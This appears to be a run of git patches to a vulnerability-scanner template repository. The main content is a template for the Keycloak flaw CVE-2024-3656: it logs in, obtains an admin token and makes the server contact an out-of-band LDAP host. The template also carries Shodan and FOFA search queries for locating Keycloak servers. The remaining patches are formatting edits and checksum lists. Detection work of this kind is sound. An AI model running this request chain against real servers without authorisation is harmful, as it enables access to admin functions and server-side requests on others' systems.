https://bugzilla.redhat.com/show_bug.cgi?id=2274403 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N + cvss-score: 8.1 + cve-id: CVE-2024-3656 + cwe-id: CWE-200 + epss-score: 0.0007 + epss-percentile: 0.31545 + metadata: + verified: true + max-request: 5 + vendor: redhat + product: keycloak + shodan-query: + - http.favicon.hash:"-1105083093" + - http.html:"keycloak" + - http.title:"keycloak" + fofa-query: + - icon_hash=-1105083093 + - body="keycloak" + - title="keycloak" + google-query: intitle:"keycloak" + tags: cve,cve2024,keycloak,auth-bypass,authenticated + +variables: + username: "{{username}}" + password: "{{password}}" + realm: "master" + code_verifier: "7BhCLfrzYxLzq3XzrfiA8TplZBDciJ0RZepiiDujJKwOaMDzMZWcqGvrCfYH6s735tzxteIUH1vWLP1D2xXm88O9XFEnxcx2" + code_challenge: "{{ trim_right(replace(replace(base64(hex_decode(sha256(code_verifier))),'/','_'),'+','-'),'=') }}" +# we can also hardcode code_challenge to wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto + +http: + - raw: + - | + GET /realms/{{realm}}/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2f{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge={{code_challenge}} HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: tabid + part: body + internal: true + regex: + - "&tab_id=(\\w+)&" + group: 1 + + - raw: + - | + GET /realms/{{realm}}/login-actions/authenticate?client_id=security-admin-console&tab_id={{tabid}}&client_data=eyJydCI6ImNvZGUiLCJybSI6InF1ZXJ5Iiwic3QiOiIxIn0= HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: auth_url + part: body + internal: true + regex: + - '"login.disabled = true; return true;" action="(.*?)"' + group: 1 + + - raw: + - | + POST {{replace(auth_url,'&','&')}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&credentialId=& + + extractors: + - type: dsl + name: codevalue + internal: true + dsl: + - replace_regex(http_3_location,".*&code=","") + - raw: + - | + POST /realms/{{realm}}/protocol/openid-connect/token HTTP/1.1 + Host: {{Hostname}} + Content-type: application/x-www-form-urlencoded + + code={{codevalue}}&grant_type=authorization_code&client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2F{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&code_verifier={{code_verifier}}& + + extractors: + - type: json + name: access_token + internal: true + json: + - '.access_token' + part: body + + - raw: + - | + POST /admin/realms/{{realm}}/testLDAPConnection HTTP/1.1 + Host: {{Hostname}} + authorization: Bearer {{access_token}} + content-type: application/json + + { + "action": "testConnection", + "connectionUrl": "ldap://{{interactsh-url}}/", + "bindDn": "cn=admin,dc=example,dc=com", + "bindCredential": "password", + "useTruststoreSpi": "ldapsOnly", + "connectionTimeout": "5000" + } + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + + - type: word + part: body + words: + - 'HTTP 403 Forbidden' + negative: true From 3b93568d889ed028c4dc2f66a6039097f1bb76c7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 18 Oct 2024 17:17:35 +0530 Subject: [PATCH 202/218] fix-error --- http/cves/2024/CVE-2024-3656.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-3656.yaml b/http/cves/2024/CVE-2024-3656.yaml index 1870332c40..6f5ca1dcef 100644 --- a/http/cves/2024/CVE-2024-3656.yaml +++ b/http/cves/2024/CVE-2024-3656.yaml @@ -40,7 +40,7 @@ variables: password: "{{password}}" realm: "master" code_verifier: "7BhCLfrzYxLzq3XzrfiA8TplZBDciJ0RZepiiDujJKwOaMDzMZWcqGvrCfYH6s735tzxteIUH1vWLP1D2xXm88O9XFEnxcx2" - code_challenge: "{{ trim_right(replace(replace(base64(hex_decode(sha256(code_verifier))),'/','_'),'+','-'),'=') }}" + code_challenge: "{{ trim_right(replace(replace(base64(hex_decode(sha256(code_verifier))),'/','_'),'+','-'),'=') }}" # we can also hardcode code_challenge to wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto http: @@ -95,12 +95,12 @@ http: code={{codevalue}}&grant_type=authorization_code&client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2F{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&code_verifier={{code_verifier}}& extractors: - - type: json - name: access_token - internal: true - json: - - '.access_token' - part: body + - type: json + part: body + name: access_token + json: + - '.access_token' + internal: true - raw: - | From e72a4ac078b4a640ca210b12ca245cdbcafc43d8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 18 Oct 2024 18:09:59 +0530 Subject: [PATCH 203/218] Update CVE-2024-8698.yaml --- http/cves/2024/CVE-2024-8698.yaml | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/http/cves/2024/CVE-2024-8698.yaml b/http/cves/2024/CVE-2024-8698.yaml index 5f7aea4e03..da0b1298ac 100644 --- a/http/cves/2024/CVE-2024-8698.yaml +++ b/http/cves/2024/CVE-2024-8698.yaml @@ -1,7 +1,7 @@ id: CVE-2024-8698 info: - name: Keycloak SAML Core Package Signature Validation Flaw + name: Keycloak - SAML Core Package Signature Validation Flaw author: iamnoooob,rootxharsh,pdresearch severity: high description: | @@ -24,16 +24,10 @@ info: max-request: 1 vendor: redhat product: keycloak - shodan-query: - - http.favicon.hash:"-1105083093" - - http.title:"keycloak" - - http.html:"keycloak" - fofa-query: - - icon_hash=-1105083093 - - body="keycloak" - - title="keycloak" + shodan-query: http.favicon.hash:"-1105083093" + fofa-query: icon_hash=-1105083093 google-query: intitle:"keycloak" - tags: cve,cve2024,keycloak,redhat + tags: cve,cve2024,keycloak,saml,signature variables: AUTH_SESSION_ID_LEGACY: "{{auth_cookie}}" # Cookie of the valid SAMLResponse message From 8115c3608607990a8013792058cd3ec663b380b0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 18 Oct 2024 18:14:44 +0530 Subject: [PATCH 204/218] Update freescout-panel.yaml --- http/exposed-panels/freescout-panel.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/exposed-panels/freescout-panel.yaml b/http/exposed-panels/freescout-panel.yaml index 295396cd03..42b723e10e 100644 --- a/http/exposed-panels/freescout-panel.yaml +++ b/http/exposed-panels/freescout-panel.yaml @@ -23,6 +23,5 @@ http: - type: dsl dsl: - 'contains(body, "FreeScout")' - - 'contains(header, "laravel_session=")' - 'status_code == 200' condition: and From a89539dc56627c2dbc48a036a604c7a93623a8e8 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 12:59:26 +0000 Subject: [PATCH 205/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 76c75b2240..4f28cc2d17 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ http/default-logins/zebra/zebra-printer-default-login.yaml http/exposed-panels/paloalto-expedition-panel.yaml http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml +http/exposed-panels/usermin-panel.yaml http/exposed-panels/veritas-netbackup-panel.yaml http/exposed-panels/vmware-aria-panel.yaml http/misconfiguration/root-path-disclosure.yaml From a910b773eba22a3737724020a0c94c346f1614d3 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 12:59:35 +0000 Subject: [PATCH 206/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4f28cc2d17..5d8665bf3f 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml http/cves/2024/CVE-2024-45488.yaml +http/cves/2024/CVE-2024-46310.yaml http/cves/2024/CVE-2024-5910.yaml http/default-logins/zebra/zebra-printer-default-login.yaml http/exposed-panels/paloalto-expedition-panel.yaml From 492a5c3e00688346ea483505821446bf2466d463 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 12:59:45 +0000 Subject: [PATCH 207/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5d8665bf3f..d5b3b9822a 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ http/cves/2024/CVE-2024-46310.yaml http/cves/2024/CVE-2024-5910.yaml http/default-logins/zebra/zebra-printer-default-login.yaml http/exposed-panels/paloalto-expedition-panel.yaml +http/exposed-panels/sqlpad-panel.yaml http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml http/exposed-panels/usermin-panel.yaml From b8628ec3688985b0423558b9b79c851b4b206b52 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 12:59:54 +0000 Subject: [PATCH 208/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d5b3b9822a..61df45efb2 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/cves/2024/CVE-2024-45488.yaml http/cves/2024/CVE-2024-46310.yaml http/cves/2024/CVE-2024-5910.yaml http/default-logins/zebra/zebra-printer-default-login.yaml +http/exposed-panels/freescout-panel.yaml http/exposed-panels/paloalto-expedition-panel.yaml http/exposed-panels/sqlpad-panel.yaml http/exposed-panels/traccar-panel.yaml From 83439e4c85ef37aac207ed4c39c354bd823b35f6 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 12:59:59 +0000 Subject: [PATCH 209/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 406 +++++++++++++++++++++-------------------- 1 file changed, 205 insertions(+), 201 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c94766a830..ff00bf4fc1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3840,6 +3840,7 @@ http/cves/2024/CVE-2024-45488.yaml:e1a7fd8753131abe67ae2c9295bee18112b9a594 http/cves/2024/CVE-2024-45507.yaml:0fba89faecb014ecb7f810822ee27c3e77c50f82 http/cves/2024/CVE-2024-45622.yaml:f22751185098b16cd3d6b473bb5e8c70e692cf11 http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 +http/cves/2024/CVE-2024-46310.yaml:8506b45fc32abe572d7264310ece99bc78f47d49 http/cves/2024/CVE-2024-46627.yaml:d780b5a681cf488780944c02cec4510044e7c0f3 http/cves/2024/CVE-2024-46986.yaml:50b477103c918decc4e15628a782b2db1b541d21 http/cves/2024/CVE-2024-47062.yaml:db115f37051cb80bcabe02cc001b5aa19a7e17e8 @@ -4510,6 +4511,7 @@ http/exposed-panels/fortinet/fortiwlm-panel.yaml:58b416a82445f61efa24e56404f9f34 http/exposed-panels/fossbilling-panel.yaml:75a6766a095950b2b30f0905543ed02285e292b2 http/exposed-panels/freeipa-panel.yaml:f233b371c8a4347054a55fb38ea8b4f3d381dd98 http/exposed-panels/freepbx-administration-panel.yaml:4fadc7db65bd76305a551a50c7bc2a68a373f429 +http/exposed-panels/freescout-panel.yaml:c1df353a10169cb358d2a48482d2234561911274 http/exposed-panels/freshrss-panel.yaml:14b86c3f6938edf67f590e792ac35f32ae8fa0c0 http/exposed-panels/friendica-panel.yaml:29fc5876b779870b976a87cd70a46ff13944b4e7 http/exposed-panels/froxlor-management-panel.yaml:f10e7eae9a4162c559a720f3c390b9e36ac7ffb9 @@ -5089,6 +5091,7 @@ http/exposed-panels/splunk-login.yaml:f3e0a45635ae22edbadc7414cde11fbeefa707a3 http/exposed-panels/spotweb-login-panel.yaml:ef2c79cd15421375ea22ff53853d80ccb11ae74f http/exposed-panels/sql-monitor.yaml:fb0303396ff02182a78cabd32ae3dd2790d91c81 http/exposed-panels/sqlbuddy-panel.yaml:724ba7d0ed925078c2079fd18c571d79f050ae3e +http/exposed-panels/sqlpad-panel.yaml:a3a1d953960f2f247de926909f4ab46f4c8397e1 http/exposed-panels/squirrelmail-login.yaml:037423949a80a46bbc5253485adb10b1dbca5a63 http/exposed-panels/sqwebmail-login-panel.yaml:0523634e1e94d7e80c7f030baf2ba7a338ebf39f http/exposed-panels/star-network-utility.yaml:99d8030add9fc52037185ac6767bc9dc72f5b495 @@ -5184,6 +5187,7 @@ http/exposed-panels/untangle-admin-login.yaml:df482c1a46cc23c86002e826efb080f37b http/exposed-panels/uptime-kuma-panel.yaml:3b472ba900fc248803a4a228fb5404c6ab0d327a http/exposed-panels/urbackup-panel.yaml:5a96d57a9312c091ba097e4239ace635d0cdf488 http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d +http/exposed-panels/usermin-panel.yaml:cf04a87b1066671fc35a1a89cfc0bd7fc569c4ce http/exposed-panels/v2924-admin-panel.yaml:20b0e24a3e6804139f1be474610304e31c942d3f http/exposed-panels/vault-panel.yaml:950157a5be3ba33db5de5a0856864cec82f96eb7 http/exposed-panels/veeam-backup-azure-panel.yaml:986e549ba8272b1fb4f420b0d61688e6c75bbe1b @@ -7842,236 +7846,236 @@ http/technologies/windows-communication-foundation-detect.yaml:b52558d968a07f23d http/technologies/wing-ftp-service-detect.yaml:92a8c8080c423ecdbe008bff39e4363d22ce995f http/technologies/wms-server-detect.yaml:5b24766a9022a18cc343b60f0381f69ce70a0b4d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:143cc12289140ccfd3b3ff43a7a7147ed9c0e41b +http/technologies/wordpress/plugins/add-to-any.yaml:c4392fb04bcec21c47ff5a360ed6b77b0dfb906e +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8e0c14e1537506a3946485f280d8d251f636f543 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:3d9f47877f12c2c3e1e8243e41043bb3c568ba7a -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:83daa6376263cc48c57bd427187c915541044b87 +http/technologies/wordpress/plugins/akismet.yaml:7df9d2db6ae85af86c01ea94cd92ea842532a2d7 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:4295d780b9b472531315521f36b40d8d34469d9f +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:af857fc21a1d2fc411a723c3fc4e107e4b2776fc +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:9aa5a04a00dc2ff234689d927c7a8a4f87592927 +http/technologies/wordpress/plugins/amp.yaml:a11efff1e6219b27508230c1fe5425488f560dda +http/technologies/wordpress/plugins/antispam-bee.yaml:45d83207379ad8570fe9bd6a572e579bde36a195 +http/technologies/wordpress/plugins/astra-sites.yaml:0464427d5dafba1e409c387f09e45887d4306278 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/autoptimize.yaml:964800330d539a6b02cfb757e39497128f360de1 +http/technologies/wordpress/plugins/backwpup.yaml:f879a1b2fc5d325f758a37d8098cbbd8fdd3c99c +http/technologies/wordpress/plugins/better-search-replace.yaml:cb8cc39c383949ed356df080359e9bd77d41b938 +http/technologies/wordpress/plugins/better-wp-security.yaml:a6ea66750460a1229d395826e2f6bebfbb687f56 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:3cd4db993d5de45451422dddb9f78fe1fab9180e +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:6272a845891e3593cf770814625a97f8bc31b8c5 +http/technologies/wordpress/plugins/breeze.yaml:00a0190ce18d5cee4417a6b70ef6b93190a2642f +http/technologies/wordpress/plugins/broken-link-checker.yaml:e497d4c2913f415a3d70f15e155e90bf820994ea http/technologies/wordpress/plugins/burst-statistics.yaml:8ae381b1138e0ed2a3121f84c7e14d33a6d6ed8a -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/chaty.yaml:a81a5ecea34fdf0c05eef1eebf62ac4bba8efb77 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:acec5d612b2fa6205ac21c6c3de690c4a6609f5b +http/technologies/wordpress/plugins/classic-editor.yaml:42b74101a57600a16a51cdabe48a37029e54e6fb +http/technologies/wordpress/plugins/classic-widgets.yaml:6436655bb9b35204383b6acf53284cccfee52a0d +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:f1ed1902a0336901374c3ef529fde1dfeda9b7a3 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:02b01785c66dee2c06b91fd257f5ea08b8d557c6 -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:85ed4754232635fa21a85b407d4cff31d35387c9 -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:3c286a547d1fe662dbc97b52f804f4843fe9fba0 +http/technologies/wordpress/plugins/coblocks.yaml:17fcf47d6aba48ea4571424e8d028722867a5384 +http/technologies/wordpress/plugins/code-snippets.yaml:383f6d784225a450de0039efa568ef7bb3bd5f2e +http/technologies/wordpress/plugins/coming-soon.yaml:629ccedbc60df48905d0439a8effa60e4319f992 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:ff31286e2a468140af17b724c2db59e40202531e +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:096eef3d10ce53b8b350a1f2645ec4371b3f391b +http/technologies/wordpress/plugins/contact-form-7.yaml:3ca774899c053e9d1967620b070a6b093aeddcdc +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:1b766de38287ac6ccd4e9a412fc1692791dae968 +http/technologies/wordpress/plugins/cookie-law-info.yaml:eaa51adf9396352004aed4038834ff4ecea9a699 +http/technologies/wordpress/plugins/cookie-notice.yaml:5449984ee332e3d8627226ab20203ae8848aa5f4 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:1a1e88bf37335369c884f5aa77572866e9568a30 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:d21a9732a599b3f4f434fd1413426eed8d32b6aa +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:797fa631b3cae3be5e06065ce2ef7d63478da94d +http/technologies/wordpress/plugins/custom-css-js.yaml:c46185960bf6f5325c417bf03ef48818deb6eb6a +http/technologies/wordpress/plugins/custom-fonts.yaml:dc4cc5660d8cb21ee84ec180265a53b273fbfee5 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:f187288ac06c8fc843fef4ac141d41a7fc1812f3 +http/technologies/wordpress/plugins/disable-comments.yaml:1459bcc258ff98535bcc6c9c767888bdc0b92df6 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:080201eb95093ed96752ded9757138098aed6f6d +http/technologies/wordpress/plugins/duplicate-page.yaml:0853241b9fc1f902833aaa6f07511bc66111c4b2 +http/technologies/wordpress/plugins/duplicate-post.yaml:aac44471587f77369fac34bf890f3d50727d8eab +http/technologies/wordpress/plugins/duplicator.yaml:cf57d8b0192847a8417a73da363d490c18fb8c62 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f979ed98bbb93bbf54f377d327ecdf5f3eb68dd8 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:78b3c78912cbdc4c8349bef72fd8fd6fa24beb21 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:022f518e7d49f749cbf45a0e81c4bcdc60f7e758 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/extendify.yaml:16df61d6c1c08c47ee240cf33df07fd008bc0a27 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:7b570aa0ddc9e1a5fb4e30d9aec562923844101a +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:5f5f2b3fa3e574db9d31655bdaea6c71205065a5 +http/technologies/wordpress/plugins/elementor.yaml:ddb990018771ad8c8d8188aa7de601063bcd20a1 +http/technologies/wordpress/plugins/elementskit-lite.yaml:30d3a29467eb000e892575a2904de3ca220173b2 +http/technologies/wordpress/plugins/enable-media-replace.yaml:102842cbd8a29d21b57fe803e00cda192ab0be0f +http/technologies/wordpress/plugins/envato-elements.yaml:ed4d5e13bfb4826b30f6e92db8cf4d9b17a9e571 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:cb79ebe98b3ce95fd28c42bddb05a1ad254f9ee3 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:83b9ef8fcc56a36696d5b35dffb291513db5c997 +http/technologies/wordpress/plugins/extendify.yaml:f1153c7cb229d03668ec4668f18ae0fc09c2a409 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:d13f9c5e30adb0534f20edf8a653318bd00a3c16 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:667dc2b7280d4c9074f51eda7595cc31aa9fb2f5 http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:55febd7249bb43dd05cf5bcc2c096b11ed2dd2f9 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:782875011c940e8bfc6f8adae8fa40d0387f6fd8 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/flamingo.yaml:dc6c8b6a689d5d98c23d3b67487b7c8f40ac050d +http/technologies/wordpress/plugins/fluent-smtp.yaml:eb3c323693256861d2fd490e3f913ef7baee9f3a +http/technologies/wordpress/plugins/fluentform.yaml:3b3983a1e2794200b614265c67e8b1cfd28cbaea +http/technologies/wordpress/plugins/font-awesome.yaml:4d5a973ae1ce6f865e103c9d6bceee8d74b139f2 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:4b25ad41c9dca421789ff42f469d78170d428912 